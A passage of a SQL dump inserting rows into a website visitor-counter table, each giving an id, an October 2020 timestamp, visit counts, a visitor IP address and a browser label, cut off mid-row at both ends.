'other'),(541527,1602940416,1,1,0,0,'31.13.127.5','other'),(541528,1602940565,1,1,0,0,'69.171.251.19','other'),(541529,1602940718,1,1,0,0,'173.252.95.21','other'),(541530,1602940726,1,1,0,0,'31.13.127.18','other'),(541531,1602940897,1,1,0,0,'173.252.95.18','other'),(541532,1602941028,1,1,0,0,'66.220.149.16','other'),(541534,1602941031,1,1,0,0,'91.124.182.166','chrome'),(541535,1602941123,1,1,0,0,'66.220.149.37','other'),(541536,1602941203,1,1,0,0,'31.13.127.24','other'),(541538,1602941304,1,1,0,0,'31.13.127.2','other'),(541539,1602941371,1,1,0,0,'173.252.95.20','other'),(541540,1602941416,1,1,0,0,'66.220.149.31','other'),(541541,1602941424,1,1,0,0,'91.196.178.29','chrome'),(541542,1602941467,1,1,0,0,'69.171.251.116','other'),(541543,1602941490,1,1,0,0,'69.171.251.22','other'),(541544,1602941514,1,1,0,0,'173.252.95.23','other'),(541545,1602941686,1,1,0,0,'31.13.127.4','other'),(541546,1602941710,1,1,0,0,'173.252.127.6','other'),(541547,1602941737,1,1,0,0,'173.252.95.21','other'),(541548,1602941775,2,2,0,0,'173.252.95.14','other'),(541549,1602941849,1,1,0,0,'173.252.127.14','other'),(541550,1602941898,1,1,0,0,'173.252.95.116','other'),(541551,1602941984,1,1,0,0,'69.171.251.119','other'),(541552,1602941990,1,1,0,0,'173.252.95.111','other'),(541553,1602942123,1,1,0,0,'31.13.127.11','other'),(541554,1602942172,1,1,0,0,'66.220.149.27','other'),(541555,1602942223,1,1,0,0,'173.252.95.18','other'),(541556,1602942274,1,1,0,0,'173.252.95.4','other'),(541557,1602942300,1,1,0,0,'173.252.95.15','other'),(541558,1602942321,1,1,0,0,'66.220.149.24','other'),(541559,1602942370,1,1,0,0,'31.13.127.119','other'),(541560,1602942403,1,1,0,0,'173.252.95.9','other'),(541561,1602942547,1,1,0,0,'31.13.103.23','other'),(541562,1602942549,1,1,0,0,'31.13.103.14','other'),(541564,1602942571,1,1,0,0,'173.252.127.8','other'),(541565,1602942573,1,1,0,0,'104.168.118.45','chrome'),(541566,1602942626,1,1,0,0,'173.252.95.13','other'),(541567,1602942680,1,1,0,0,'173.252.95.10','other'),(541568,1602942687,1,1,0,0,'66.220.149.8','other'),(541569,1602942825,1,1,0,0,'31.13.127.117','other'),(541570,1602942881,1,1,0,0,'173.252.127.20','other'),(541571,1602942929,1,1,0,0,'69.171.251.8','other'),(541572,1602942976,1,1,0,0,'69.171.251.6','other'),(541573,1602942989,2,2,0,0,'31.13.127.6','other'),(541574,1602943021,1,1,0,0,'173.252.95.116','other'),(541575,1602943023,1,1,0,0,'69.171.251.117','other'),(541576,1602943082,1,1,0,0,'173.252.95.112','other'),(541577,1602943098,1,1,0,0,'66.220.149.7','other'),(541578,1602943228,1,1,0,0,'66.220.149.12','other'),(541579,1602943259,2,2,0,0,'31.13.103.3','other'),(541580,1602943482,1,1,0,0,'69.171.251.14','other'),(541581,1602943548,1,1,0,0,'173.252.127.6','other'),(541582,1602943619,3,3,0,0,'173.252.95.15','other'),(541583,1602943696,1,1,0,0,'66.220.149.37','other'),(541584,1602943741,1,1,0,0,'66.220.149.1','other'),(541585,1602943797,1,1,0,0,'173.252.95.118','other'),(541586,1602943810,1,1,0,0,'66.220.149.18','other'),(541587,1602943915,1,1,0,0,'91.196.178.132','chrome'),(541588,1602943918,1,1,0,0,'173.252.127.32','other'),(541589,1602944030,1,1,0,0,'31.13.115.10','other'),(541590,1602944053,2,2,0,0,'173.252.95.19','other'),(541591,1602944118,1,1,0,0,'31.13.127.119','other'),(541592,1602944162,1,1,0,0,'66.220.149.21','other'),(541593,1602944287,1,1,0,0,'173.252.95.18','other'),(541594,1602944304,1,1,0,0,'173.252.95.9','other'),(541595,1602944307,1,1,0,0,'69.171.251.1','other'),(541596,1602944371,1,1,0,0,'66.220.149.25','other'),(541597,1602944434,1,1,0,0,'31.13.127.1','other'),(541598,1602944807,1,1,0,0,'66.220.149.36','other'),(541599,1602944810,1,1,0,0,'31.13.103.4','other'),(541600,1602944833,1,1,0,0,'31.13.127.24','other'),(541601,1602944891,1,1,0,0,'173.252.95.25','other'),(541602,1602944910,1,1,0,0,'31.13.127.21','other'),(541603,1602944911,1,1,0,0,'173.252.127.17','other'),(541604,1602944927,1,1,0,0,'31.13.127.5','other'),(541605,1602944931,1,1,0,0,'69.171.251.12','other'),(541607,1602944937,1,1,0,0,'31.13.127.17','other'),(541608,1602944938,1,1,0,0,'31.13.127.10','other'),(541609,1602944994,1,1,0,0,'69.171.251.8','other'),(541610,1602945039,1,1,0,0,'173.252.95.6','other'),(541611,1602945159,1,1,0,0,'173.252.95.116','other'),(541612,1602945181,1,1,0,0,'173.252.95.12','other'),(541613,1602945263,1,1,0,0,'66.220.149.17','other'),(541614,1602945333,1,1,0,0,'69.171.251.23','other'),(541615,1602945366,2,2,0,0,'31.13.127.22','other'),(541616,1602945508,1,1,0,0,'31.13.127.18','other'),(541617,1602945550,1,1,0,0,'173.252.95.117','other'),(541618,1602945557,1,1,0,0,'173.252.95.11','other'),(541619,1602945625,1,1,0,0,'69.171.251.1','other'),(541620,1602945710,1,1,0,0,'173.252.95.2','other'),(541621,1602945750,1,1,0,0,'173.252.95.7','other'),(541622,1602945786,1,1,0,0,'66.220.149.23','other'),(541623,1602945803,1,1,0,0,'31.13.103.17','other'),(541624,1602946065,1,1,0,0,'31.13.115.2','other'),(541625,1602946168,1,1,0,0,'173.252.95.4','other'),(541626,1602946177,1,1,0,0,'31.13.127.16','other'),(541627,1602946238,1,1,0,0,'69.171.251.13','other'),(541628,1602946244,1,1,0,0,'66.220.149.17','other'),(541629,1602946341,1,1,0,0,'69.171.251.12','other'),(541630,1602946500,1,1,0,0,'31.13.127.4','other'),(541631,1602946545,1,1,0,0,'173.252.95.3','other'),(541632,1602946571,1,1,0,0,'31.13.115.116','other'),(541633,1602946719,2,2,0,0,'173.252.95.5','other'),(541634,1602946798,1,1,0,0,'31.13.103.16','other'),(541635,1602946799,1,1,0,0,'31.13.103.24','other'),(541636,1602946834,2,2,0,0,'31.13.127.7','other'),(541637,1602946969,1,1,0,0,'173.252.95.10','other'),(541638,1602947006,1,1,0,0,'176.98.18.179','chrome'),(541639,1602947012,1,1,0,0,'69.171.251.17','other'),(541640,1602947028,1,1,0,0,'173.252.95.117','other'),(541641,1602947029,1,1,0,0,'31.13.127.24','other'),(541642,1602947055,1,1,0,0,'66.220.149.33','other'),(541643,1602947160,1,1,0,0,'173.252.95.16','other'),(541644,1602947248,1,1,0,0,'173.252.95.19','other'),(541645,1602947303,2,2,0,0,'173.252.95.17','other'),(541646,1602947363,1,1,0,0,'66.220.149.27','other'),(541647,1602947387,1,1,0,0,'173.252.95.20','other'),(541648,1602947529,1,1,0,0,'66.220.149.15','other'),(541649,1602947551,1,1,0,0,'173.252.127.6','other'),(541650,1602947660,2,2,0,0,'31.13.103.111','other'),(541651,1602947734,1,1,0,0,'31.13.127.120','other'),(541652,1602947736,1,1,0,0,'173.252.95.25','other'),(541653,1602947750,1,1,0,0,'66.220.149.37','other'),(541654,1602947756,2,2,0,0,'69.171.251.119','other'),(541655,1602947893,2,2,0,0,'173.252.95.11','other'),(541656,1602948272,1,1,0,0,'69.171.251.117','other'),(541657,1602948358,1,1,0,0,'66.220.149.28','other'),(541658,1602948359,1,1,0,0,'31.13.103.18','other'),(541659,1602948400,1,1,0,0,'173.252.95.17','other'),(541660,1602948405,1,1,0,0,'173.252.95.18','other'),(541661,1602948427,1,1,0,0,'173.252.127.20','other'),(541662,1602948432,2,2,0,0,'31.13.127.15','other'),(541663,1602948467,2,2,0,0,'173.252.95.23','other'),(541664,1602948531,1,1,0,0,'69.171.251.21','other'),(541665,1602948539,1,1,0,0,'66.220.149.7','other'),(541666,1602948617,1,1,0,0,'31.13.127.9','other'),(541667,1602948783,1,1,0,0,'173.252.95.24','other'),(541668,1602948785,1,1,0,0,'173.252.95.111','other'),(541669,1602948854,1,1,0,0,'66.220.149.26','other'),(541670,1602948871,1,1,0,0,'173.252.95.10','other'),(541671,1602948903,1,1,0,0,'66.220.149.33','other'),(541672,1602949193,1,1,0,0,'69.171.251.120','other'),(541673,1602949217,2,2,0,0,'31.13.127.4','other'),(541674,1602949254,1,1,0,0,'173.252.95.7','other'),(541675,1602949523,1,1,0,0,'31.13.103.15','other'),(541676,1602949809,1,1,0,0,'31.13.127.13','other'),(541677,1602949816,1,1,0,0,'66.220.149.118','other'),(541678,1602949820,1,1,0,0,'173.252.95.3','other'),(541679,1602950016,1,1,0,0,'31.13.127.1','other'),(541680,1602950038,1,1,0,0,'173.252.95.10','other'),(541681,1602950132,1,1,0,0,'69.171.251.10','other'),(541682,1602950154,1,1,0,0,'66.220.149.32','other'),(541683,1602950182,2,2,0,0,'31.13.127.8','other'),(541684,1602950287,1,1,0,0,'31.13.103.3','other'),(541685,1602950294,1,1,0,0,'31.13.103.14','other'),(541686,1602950312,1,1,0,0,'66.220.149.27','other'),(541687,1602950354,1,1,0,0,'173.252.95.4','other'),(541688,1602950464,1,1,0,0,'173.252.95.117','other'),(541689,1602950529,1,1,0,0,'173.252.95.18','other'),(541690,1602950532,1,1,0,0,'31.13.127.15','other'),(541691,1602950625,1,1,0,0,'173.252.95.11','other'),(541692,1602950908,1,1,0,0,'69.171.251.26','other'),(541693,1602950916,1,1,0,0,'104.168.118.79','chrome'),(541694,1602950950,1,1,0,0,'31.13.127.13','other'),(541695,1602950952,1,1,0,0,'66.220.149.22','other'),(541696,1602950968,1,1,0,0,'31.13.127.11','other'),(541697,1602951050,2,2,0,0,'173.252.95.16','other'),(541698,1602951069,1,1,0,0,'93.170.117.25','other'),(541699,1602951101,1,1,0,0,'69.171.251.4','other'),(541700,1602951160,1,1,0,0,'66.220.149.120','other'),(541701,1602951287,1,1,0,0,'173.252.127.7','other'),(541702,1602951418,1,1,0,0,'31.13.127.14','other'),(541703,1602951450,1,1,0,0,'69.171.251.111','other'),(541704,1602951451,2,2,0,0,'173.252.95.23','other'),(541705,1602951501,1,1,0,0,'173.252.95.17','other'),(541706,1602951593,1,1,0,0,'173.252.95.24','other'),(541707,1602951614,1,1,0,0,'31.13.103.13','other'),(541708,1602951653,1,1,0,0,'31.13.127.20','other'),(541709,1602951707,1,1,0,0,'31.13.127.9','other'),(541710,1602951791,1,1,0,0,'173.252.83.112','other'),(541713,1602951795,1,1,0,0,'173.252.95.111','other'),(541714,1602951850,1,1,0,0,'173.252.95.11','other'),(541715,1602951921,1,1,0,0,'66.220.149.14','other'),(541716,1602951984,1,1,0,0,'173.252.127.13','other'),(541717,1602952047,1,1,0,0,'31.13.127.18','other'),(541718,1602952088,1,1,0,0,'66.220.149.26','other'),(541719,1602952190,2,2,0,0,'173.252.95.21','other'),(541720,1602952227,2,2,0,0,'173.252.95.119','other'),(541721,1602952277,1,1,0,0,'69.171.251.9','other'),(541722,1602952295,1,1,0,0,'66.220.149.111','other'),(541723,1602952362,1,1,0,0,'31.13.127.10','other'),(541724,1602952366,1,1,0,0,'69.171.251.13','other'),(541725,1602952402,1,1,0,0,'173.252.95.120','other'),(541726,1602952494,1,1,0,0,'173.252.95.25','other'),(541727,1602952584,1,1,0,0,'31.13.115.1','other'),(541728,1602952653,1,1,0,0,'66.220.149.117','other'),(541729,1602952674,1,1,0,0,'104.168.118.141','chrome'),(541730,1602952735,1,1,0,0,'31.13.127.2','other'),(541731,1602952813,1,1,0,0,'173.252.95.2','other'),(541732,1602952933,1,1,0,0,'69.171.251.8','other'),(541733,1602952957,1,1,0,0,'31.13.127.111','other'),(541734,1602953031,1,1,0,0,'69.171.251.5','other'),(541735,1602953050,2,2,0,0,'173.252.95.19','other'),(541736,1602953096,1,1,0,0,'69.171.251.11','other'),(541737,1602953097,1,1,0,0,'66.220.149.19','other'),(541738,1602953173,1,1,0,0,'69.171.251.19','other'),(541739,1602953174,1,1,0,0,'31.13.127.119','other'),(541740,1602953183,2,2,0,0,'66.220.149.3','other'),(541741,1602953186,1,1,0,0,'88.155.175.224','chrome'),(541742,1602953283,1,1,0,0,'173.252.127.117','other'),(541743,1602953356,1,1,0,0,'173.252.95.11','other'),(541744,1602953390,1,1,0,0,'37.73.31.82','chrome'),(541745,1602953451,1,1,0,0,'173.252.127.1','other'),(541746,1602953485,1,1,0,0,'31.13.103.6','other'),(541747,1602953539,1,1,0,0,'173.252.95.24','other'),(541748,1602953609,1,1,0,0,'66.220.149.14','other'),(541749,1602953641,1,1,0,0,'173.252.95.22','other'),(541750,1602953677,1,1,0,0,'69.171.251.119','other'),(541751,1602953681,1,1,0,0,'173.252.95.113','other'),(541752,1602953693,2,2,0,0,'173.252.95.16','other'),(541753,1602953732,1,1,0,0,'173.252.95.120','other'),(541754,1602953827,1,1,0,0,'69.171.251.120','other'),(541755,1602953883,1,1,0,0,'31.13.127.120','other'),(541757,1602954113,1,1,0,0,'173.252.95.18','other'),(541758,1602954289,1,1,0,0,'173.252.127.7','other'),(541759,1602954293,1,1,0,0,'69.171.251.19','other'),(541760,1602954320,1,1,0,0,'66.220.149.11','other'),(541761,1602954333,1,1,0,0,'185.237.217.23','chrome'),(541762,1602954423,1,1,0,0,'66.220.149.5','other'),(541763,1602954450,1,1,0,0,'173.252.95.15','other'),(541764,1602954531,1,1,0,0,'66.220.149.24','other'),(541765,1602954571,1,1,0,0,'31.13.127.119','other'),(541766,1602954611,2,2,0,0,'31.13.127.19','other'),(541767,1602955004,2,2,0,0,'31.13.127.24','other'),(541768,1602955020,1,1,0,0,'31.13.103.20','other'),(541770,1602955022,1,1,0,0,'31.13.103.4','other'),(541771,1602955049,1,1,0,0,'91.196.178.25','chrome'),(541772,1602955202,1,1,0,0,'31.13.127.5','other'),(541773,1602955246,1,1,0,0,'31.13.127.4','other'),(541774,1602955403,1,1,0,0,'66.220.149.36','other'),(541775,1602955454,1,1,0,0,'31.13.127.9','other'),(541776,1602955487,1,1,0,0,'173.252.127.7','other'),(541777,1602955514,1,1,0,0,'69.171.251.5','other'),(541778,1602955538,1,1,0,0,'69.171.251.2','other'),(541779,1602955639,1,1,0,0,'173.252.127.11','other'),(541780,1602955657,1,1,0,0,'173.252.95.23','other'),(541781,1602955748,1,1,0,0,'66.220.149.37','other'),(541782,1602955749,1,1,0,0,'173.252.95.13','other'),(541783,1602955808,1,1,0,0,'173.252.95.20','other'),(541784,1602955885,1,1,0,0,'31.13.127.116','other'),(541785,1602955886,1,1,0,0,'66.220.149.5','other'),(541786,1602955924,1,1,0,0,'173.252.127.6','other'),(541788,1602955929,1,1,0,0,'31.13.127.23','other'),(541789,1602956026,1,1,0,0,'173.252.95.11','other'),(541790,1602956048,1,1,0,0,'69.171.251.120','other'),(541791,1602956049,1,1,0,0,'69.171.251.17','other'),(541792,1602956058,1,1,0,0,'31.13.127.7','other'),(541793,1602956171,1,1,0,0,'173.252.127.118','other'),(541794,1602956182,1,1,0,0,'69.171.251.1','other'),(541795,1602956261,1,1,0,0,'5.255.253.92','other'),(541796,1602956265,1,1,0,0,'173.252.95.26','other'),(541797,1602956273,1,1,0,0,'66.220.149.32','other'),(541799,1602956275,1,1,0,0,'69.171.251.112','other'),(541800,1602956367,1,1,0,0,'31.13.115.5','other'),(541801,1602956368,1,1,0,0,'31.13.115.20','other'),(541802,1602956718,1,1,0,0,'31.13.127.20','other'),(541803,1602956719,1,1,0,0,'31.13.127.13','other'),(541804,1602956735,1,1,0,0,'173.252.95.6','other'),(541805,1602956738,1,1,0,0,'173.252.95.1','other'),(541806,1602956887,1,1,0,0,'173.252.95.113','other'),(541807,1602956919,1,1,0,0,'69.171.251.10','other'),(541808,1602956933,1,1,0,0,'31.13.115.1','other'),(541809,1602956949,1,1,0,0,'173.252.95.10','other'),(541810,1602956956,1,1,0,0,'31.13.127.111','other'),(541811,1602956973,1,1,0,0,'69.171.251.119','other'),(541812,1602956998,1,1,0,0,'66.220.149.33','other'),(541813,1602957070,1,1,0,0,'31.13.103.18','other'),(541814,1602957071,1,1,0,0,'31.13.103.23','other'),(541815,1602957147,1,1,0,0,'66.220.149.35','other'),(541816,1602957310,1,1,0,0,'31.13.127.4','other'),(541817,1602957379,1,1,0,0,'66.220.149.4','other'),(541818,1602957450,1,1,0,0,'173.252.95.24','other'),(541819,1602957535,1,1,0,0,'173.252.127.15','other'),(541820,1602957559,1,1,0,0,'69.171.251.2','other'),(541821,1602957560,1,1,0,0,'173.252.127.18','other'),(541822,1602957577,1,1,0,0,'66.220.149.10','other'),(541823,1602957620,1,1,0,0,'173.252.95.14','other'),(541824,1602957634,1,1,0,0,'69.171.251.18','other'),(541825,1602957914,1,1,0,0,'69.171.251.6','other'),(541826,1602957960,1,1,0,0,'173.252.127.120','other'),(541827,1602957976,1,1,0,0,'31.13.127.7','other'),(541828,1602958105,1,1,0,0,'31.13.115.11','other'),(541829,1602958185,1,1,0,0,'173.252.95.23','other'),(541830,1602958293,1,1,0,0,'173.252.95.10','other'),(541831,1602958306,1,1,0,0,'173.252.95.113','other'),(541832,1602958434,1,1,0,0,'173.252.127.119','other'),(541833,1602958460,1,1,0,0,'173.252.95.26','other'),(541834,1602958498,1,1,0,0,'91.196.178.70','chrome'),(541835,1602958507,1,1,0,0,'69.171.251.25','other'),(541836,1602958538,1,1,0,0,'31.13.115.23','other'),(541837,1602958570,1,1,0,0,'173.252.95.4','other'),(541838,1602958662,1,1,0,0,'31.13.127.23','other'),(541839,1602958663,1,1,0,0,'69.171.251.20','other'),(541840,1602958664,1,1,0,0,'69.171.251.21','other'),(541841,1602958673,1,1,0,0,'66.220.149.34','other'),(541842,1602958734,1,1,0,0,'46.133.36.75','chrome'),(541843,1602958817,1,1,0,0,'173.252.127.24','other'),(541844,1602958864,1,1,0,0,'31.13.127.116','other'),(541845,1602958931,1,1,0,0,'31.13.115.19','other'),(541846,1602958932,1,1,0,0,'31.13.115.116','other'),(541847,1602958956,1,1,0,0,'66.220.149.5','other'),(541848,1602958993,1,1,0,0,'31.13.115.17','other'),(541849,1602959078,2,2,0,0,'173.252.95.25','other'),(541850,1602959163,1,1,0,0,'173.252.95.9','other'),(541851,1602959232,1,1,0,0,'66.220.149.21','other'),(541852,1602959237,1,1,0,0,'173.252.127.32','other'),(541853,1602959258,1,1,0,0,'173.252.95.119','other'),(541854,1602959343,1,1,0,0,'173.252.95.14','other'),(541855,1602959379,1,1,0,0,'69.171.251.22','other'),(541856,1602959380,1,1,0,0,'31.13.127.22','other'),(541857,1602959471,1,1,0,0,'173.252.95.17','other'),(541858,1602959548,1,1,0,0,'66.220.149.1','other'),(541859,1602959605,1,1,0,0,'31.13.103.2','other'),(541860,1602959712,1,1,0,0,'91.196.178.150','chrome'),(541861,1602959771,1,1,0,0,'31.13.127.116','other'),(541862,1602959773,1,1,0,0,'66.220.149.112','other'),(541863,1602959794,1,1,0,0,'173.252.111.13','other'),(541864,1602959901,1,1,0,0,'173.252.95.20','other'),(541865,1602959926,1,1,0,0,'173.252.83.24','other'),(541866,1602959928,1,1,0,0,'173.252.83.118','other'),(541867,1602959971,1,1,0,0,'31.13.127.5','other'),(541868,1602960008,1,1,0,0,'31.13.127.10','other'),(541869,1602960112,1,1,0,0,'173.252.127.120','other'),(541870,1602960251,1,1,0,0,'173.252.95.11','other'),(541871,1602960268,1,1,0,0,'31.13.127.19','other'),(541872,1602960307,1,1,0,0,'69.171.251.11','other'),(541873,1602960308,1,1,0,0,'66.220.149.14','other'),(541874,1602960367,1,1,0,0,'66.220.149.10','other'),(541875,1602960390,1,1,0,0,'91.196.178.182','chrome'),(541876,1602960398,1,1,0,0,'173.252.95.120','other'),(541877,1602960527,1,1,0,0,'66.220.149.30','other'),(541878,1602960799,1,1,0,0,'173.252.95.7','other'),(541879,1602960941,1,1,0,0,'173.252.127.26','other'),(541881,1602960953,1,1,0,0,'173.252.111.3','other'),(541882,1602960973,1,1,0,0,'173.252.95.10','other'),(541883,1602961045,1,1,0,0,'31.13.127.117','other'),(541884,1602961046,1,1,0,0,'173.252.95.20','other'),(541885,1602961055,1,1,0,0,'69.171.251.22','other'),(541886,1602961083,1,1,0,0,'66.220.149.34','other'),(541887,1602961316,1,1,0,0,'66.220.149.2','other'),(541888,1602961317,1,1,0,0,'173.252.127.24','other'),(541889,1602961385,1,1,0,0,'66.220.149.35','other'),(541890,1602961521,1,1,0,0,'173.252.95.3','other'),(541891,1602961618,1,1,0,0,'173.252.95.119','other'),(541892,1602961707,1,1,0,0,'173.252.95.23','other'),(541893,1602961734,2,2,0,0,'31.13.127.113','other'),(541894,1602961785,1,1,0,0,'69.171.251.116','other'),(541895,1602961803,1,1,0,0,'31.13.115.14','other'),(541896,1602961804,1,1,0,0,'66.220.149.32','other'),(541897,1602961951,1,1,0,0,'91.196.178.25','chrome'),(541898,1602962213,1,1,0,0,'173.252.111.7','other'),(541900,1602962224,1,1,0,0,'173.252.95.11','other'),(541901,1602962370,1,1,0,0,'173.252.95.18','other'),(541902,1602962497,2,2,0,0,'173.252.95.17','other'),(541903,1602962623,1,1,0,0,'69.171.251.9','other'),(541904,1602962912,1,1,0,0,'31.13.115.16','other'),(541905,1602962980,1,1,0,0,'69.171.251.7','other'),(541906,1602963004,1,1,0,0,'31.13.103.120','other'),(541907,1602963055,1,1,0,0,'31.13.127.9','other'),(541908,1602963219,1,1,0,0,'173.252.95.113','other'),(541909,1602963258,1,1,0,0,'173.252.95.8','other'),(541910,1602963293,1,1,0,0,'173.252.83.12','other'),(541912,1602963294,1,1,0,0,'173.252.83.5','other'),(541913,1602963330,1,1,0,0,'66.220.149.112','other'),(541914,1602963383,3,3,0,0,'31.13.127.11','other'),(541915,1602963474,1,1,0,0,'69.171.251.24','other'),(541916,1602963496,1,1,0,0,'173.252.95.19','other'),(541917,1602963517,1,1,0,0,'66.220.149.27','other'),(541918,1602963714,1,1,0,0,'31.13.127.19','other'),(541919,1602963747,1,1,0,0,'173.252.127.30','other'),(541920,1602963748,1,1,0,0,'173.252.127.17','other'),(541921,1602963751,1,1,0,0,'178.137.9.210','other'),(541922,1602963904,1,1,0,0,'69.171.251.13','other'),(541923,1602963932,1,1,0,0,'69.171.251.14','other'),(541924,1602963970,1,1,0,0,'173.252.95.1','other'),(541925,1602964044,1,1,0,0,'173.252.111.20','other'),(541926,1602964066,1,1,0,0,'46.211.64.185','chrome'),(541927,1602964072,2,2,0,0,'173.252.95.4','other'),(541928,1602964076,1,1,0,0,'69.171.251.20','other'),(541929,1602964079,1,1,0,0,'173.252.111.18','other'),(541930,1602964106,1,1,0,0,'173.252.111.7','other'),(541931,1602964167,1,1,0,0,'173.252.95.10','other'),(541932,1602964241,1,1,0,0,'31.13.127.21','other'),(541933,1602964246,2,2,0,0,'173.252.95.25','other'),(541935,1602964266,1,1,0,0,'185.177.190.189','chrome'),(541936,1602964355,1,1,0,0,'173.252.95.17','other'),(541937,1602964439,1,1,0,0,'69.171.251.2','other'),(541938,1602964476,1,1,0,0,'66.220.149.37','other'),(541939,1602964737,1,1,0,0,'31.13.127.23','other'),(541940,1602964984,1,1,0,0,'173.252.95.13','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (541941,1602964986,1,1,0,0,'173.252.95.7','other'),(541942,1602965048,1,1,0,0,'173.252.95.20','other'),(541943,1602965121,1,1,0,0,'173.252.127.120','other'),(541944,1602965355,1,1,0,0,'31.13.127.11','other'),(541945,1602965496,1,1,0,0,'31.13.127.6','other'),(541946,1602965591,1,1,0,0,'173.252.95.17','other'),(541947,1602965595,1,1,0,0,'173.252.95.3','other'),(541948,1602965883,1,1,0,0,'173.252.95.24','other'),(541949,1602965884,1,1,0,0,'31.13.127.4','other'),(541950,1602966000,1,1,0,0,'173.252.95.5','other'),(541951,1602966001,2,2,0,0,'173.252.95.12','other'),(541952,1602966009,1,1,0,0,'69.171.251.6','other'),(541954,1602966150,1,1,0,0,'69.171.251.9','other'),(541955,1602966171,1,1,0,0,'69.171.251.15','other'),(541957,1602966186,1,1,0,0,'31.13.127.5','other'),(541958,1602966205,1,1,0,0,'91.196.178.13','chrome'),(541959,1602966275,1,1,0,0,'31.13.115.112','other'),(541960,1602966740,1,1,0,0,'31.13.127.111','other'),(541961,1602966773,1,1,0,0,'173.252.127.10','other'),(541962,1602966779,1,1,0,0,'69.171.251.7','other'),(541963,1602966825,1,1,0,0,'31.13.127.9','other'),(541964,1602966834,1,1,0,0,'66.220.149.23','other'),(541965,1602967052,1,1,0,0,'173.252.95.22','other'),(541966,1602967139,1,1,0,0,'173.252.95.3','other'),(541967,1602967163,1,1,0,0,'173.252.95.25','other'),(541968,1602967339,1,1,0,0,'173.252.95.116','other'),(541969,1602967361,1,1,0,0,'37.55.238.143','chrome'),(541970,1602967406,2,2,0,0,'69.171.251.10','other'),(541971,1602967481,1,1,0,0,'31.13.127.20','other'),(541972,1602967641,1,1,0,0,'31.13.127.23','other'),(541973,1602967647,1,1,0,0,'173.252.95.15','other'),(541974,1602967708,1,1,0,0,'66.220.149.119','other'),(541975,1602967924,1,1,0,0,'66.220.149.6','other'),(541976,1602968257,1,1,0,0,'31.13.127.9','other'),(541977,1602968295,1,1,0,0,'69.171.251.24','other'),(541978,1602968522,1,1,0,0,'173.252.95.7','other'),(541979,1602968606,1,1,0,0,'66.220.149.111','other'),(541980,1602968645,1,1,0,0,'69.171.251.7','other'),(541981,1602968651,1,1,0,0,'66.220.149.27','other'),(541982,1602968655,1,1,0,0,'173.252.127.11','other'),(541983,1602968970,1,1,0,0,'66.220.149.29','other'),(541984,1602968979,1,1,0,0,'69.171.251.5','other'),(541985,1602968996,1,1,0,0,'173.252.95.14','other'),(541986,1602969086,2,2,0,0,'173.252.95.23','other'),(541987,1602969258,1,1,0,0,'91.196.178.6','chrome'),(541988,1602969413,1,1,0,0,'173.252.95.2','other'),(541989,1602969446,1,1,0,0,'173.252.95.13','other'),(541990,1602969474,1,1,0,0,'66.220.149.17','other'),(541991,1602969481,1,1,0,0,'31.13.127.20','other'),(541992,1602969535,1,1,0,0,'31.13.127.18','other'),(541993,1602969642,1,1,0,0,'31.13.127.22','other'),(541994,1602969891,1,1,0,0,'31.13.115.24','other'),(541995,1602970536,1,1,0,0,'31.13.127.7','other'),(541996,1602970550,1,1,0,0,'69.171.251.25','other'),(541997,1602970865,1,1,0,0,'173.252.95.8','other'),(541998,1602971128,1,1,0,0,'173.252.95.10','other'),(541999,1602971150,1,1,0,0,'31.13.127.4','other'),(542000,1602971358,1,1,0,0,'66.220.149.116','other'),(542001,1602971599,1,1,0,0,'69.171.251.22','other'),(542002,1602971653,1,1,0,0,'173.252.95.116','other'),(542003,1602971714,1,1,0,0,'66.220.149.4','other'),(542004,1602971910,1,1,0,0,'31.13.127.111','other'),(542005,1602971912,1,1,0,0,'173.252.95.18','other'),(542006,1602971983,1,1,0,0,'66.220.149.30','other'),(542007,1602972161,1,1,0,0,'173.252.95.23','other'),(542008,1602972220,1,1,0,0,'173.252.95.16','other'),(542009,1602972284,1,1,0,0,'31.13.127.3','other'),(542010,1602972289,1,1,0,0,'66.220.149.27','other'),(542011,1602972527,1,1,0,0,'66.220.149.8','other'),(542012,1602972601,1,1,0,0,'46.211.32.179','chrome'),(542013,1602972825,1,1,0,0,'66.220.149.111','other'),(542014,1602973089,1,1,0,0,'173.252.87.14','other'),(542015,1602973090,1,1,0,0,'173.252.87.2','other'),(542016,1602973342,1,1,0,0,'173.252.95.118','other'),(542017,1602973359,1,1,0,0,'31.13.127.19','other'),(542018,1602973493,1,1,0,0,'173.252.95.2','other'),(542019,1602973514,1,0,1,0,'66.249.66.93',''),(542020,1602973578,1,1,0,0,'173.252.95.23','other'),(542021,1602973650,1,1,0,0,'69.171.251.4','other'),(542022,1602973763,1,1,0,0,'104.168.118.23','chrome'),(542023,1602973957,1,1,0,0,'173.252.95.4','other'),(542024,1602973967,1,1,0,0,'31.13.127.116','other'),(542025,1602974493,1,1,0,0,'31.13.127.7','other'),(542026,1602974596,1,1,0,0,'173.252.127.30','other'),(542027,1602974781,1,1,0,0,'66.220.149.18','other'),(542029,1602975008,1,1,0,0,'66.220.149.2','other'),(542031,1602976257,1,1,0,0,'5.255.253.92','other'),(542032,1602976266,1,1,0,0,'5.255.253.87','other'),(542033,1602976982,1,1,0,0,'173.252.127.25','other'),(542034,1602977036,1,1,0,0,'31.13.127.23','other'),(542035,1602977659,1,1,0,0,'69.171.251.15','other'),(542036,1602977671,1,1,0,0,'31.13.127.120','other'),(542037,1602978904,1,1,0,0,'31.13.103.17','other'),(542038,1602978906,1,1,0,0,'31.13.103.19','other'),(542039,1602979650,1,1,0,0,'31.13.127.112','other'),(542040,1602979697,1,1,0,0,'173.252.87.4','other'),(542041,1602979698,1,1,0,0,'173.252.87.22','other'),(542042,1602980759,1,1,0,0,'69.171.251.25','other'),(542043,1602980784,1,1,0,0,'31.13.103.13','other'),(542044,1602980943,1,1,0,0,'173.252.95.22','other'),(542045,1602980979,1,1,0,0,'31.13.127.24','other'),(542046,1602981313,1,1,0,0,'173.252.95.112','other'),(542047,1602981499,1,1,0,0,'31.13.103.18','other'),(542049,1602982666,1,1,0,0,'173.252.95.15','other'),(542050,1602983009,1,1,0,0,'66.220.149.8','other'),(542051,1602984045,1,1,0,0,'173.252.95.120','other'),(542052,1602984203,1,1,0,0,'31.13.127.111','other'),(542053,1602984611,1,1,0,0,'173.252.95.15','other'),(542054,1602985351,1,1,0,0,'5.45.207.150','other'),(542055,1602985356,1,1,0,0,'173.252.127.18','other'),(542056,1602985908,1,1,0,0,'173.252.95.13','other'),(542057,1602985910,1,1,0,0,'31.13.103.10','other'),(542058,1602987171,1,1,0,0,'31.13.103.6','other'),(542059,1602989214,1,1,0,0,'66.220.149.28','other'),(542060,1602989923,1,1,0,0,